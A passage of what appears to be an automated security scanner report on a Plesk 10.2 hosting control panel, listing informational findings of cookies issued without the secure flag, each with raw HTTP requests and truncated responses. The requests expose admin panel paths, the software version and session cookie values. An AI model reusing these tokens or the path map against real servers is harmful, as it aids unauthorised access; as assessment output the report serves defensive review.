4.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list/reset-search/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:01 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=subscriptions; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server
Content-Length: 19812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /left.php3

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /left.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psaContext=dashboard; PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:34:33 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=dashboard; path=/
Date: Fri, 23 Sep 2011 18:34:33 GMT
Server: sw-cp-server
Content-Length: 18650

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <link rel="shortcut icon"
...[SNIP]...

4.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /license.php3

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /license.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:32:37 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=dashboard; path=/
Date: Fri, 23 Sep 2011 18:32:37 GMT
Server: sw-cp-server
Content-Length: 23854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <link rel="shortcut icon
...[SNIP]...

4.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /login_up.php3

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login_up.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BarExpanded=True; PHPSESSID=e4155988e1f250b6a55cb24dea872fd0; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:19:18 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Plesk: PSA-Key/PLSK016479390000
Set-Cookie: psaContext=customers; path=/
Date: Fri, 23 Sep 2011 19:19:18 GMT
Server: sw-cp-server
Content-Length: 5389

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Cont
...[SNIP]...

4.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-info/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-info/?context=personal-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:12:11 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=personal-info; path=/
Date: Fri, 23 Sep 2011 19:12:11 GMT
Server: sw-cp-server
Content-Length: 20512

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="067
...[SNIP]...

4.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-password/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-password/?context=credentials-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:42:30 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=credentials-info; path=/
Date: Fri, 23 Sep 2011 19:42:30 GMT
Server: sw-cp-server
Content-Length: 9194

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="6cf
...[SNIP]...

4.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain-summary-report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/domain-summary-report/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain-summary-report/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:53:20 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:53:20 GMT
Server: sw-cp-server
Content-Length: 9186

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="1ab
...[SNIP]...

4.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/domain@any/traffic/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:19 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:27:19 GMT
Server: sw-cp-server
Content-Length: 9102

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/ipaddress@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/ipaddress@/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/ipaddress@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:12 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:27:12 GMT
Server: sw-cp-server
Content-Length: 9058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/skeleton/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/skeleton/?cmd=chdir&file=%2F HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:30:52 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:52 GMT
Server: sw-cp-server
Content-Length: 22069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@4/domain@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@4/domain@any/traffic/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@4/domain@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:54:19 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:54:19 GMT
Server: sw-cp-server
Content-Length: 9272

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="1ab
...[SNIP]...

4.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@5/domain@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@5/domain@any/traffic/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@5/domain@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:27:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:27:13 GMT
Server: sw-cp-server
Content-Length: 9412

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/ftp-repository/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/ftp-repository/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 16:05:25 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 16:05:25 GMT
Server: sw-cp-server
Content-Length: 13490

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="094
...[SNIP]...

4.43. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/ftp-repository/properties/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/ftp-repository/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:13 GMT
Server: sw-cp-server
Content-Length: 8796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
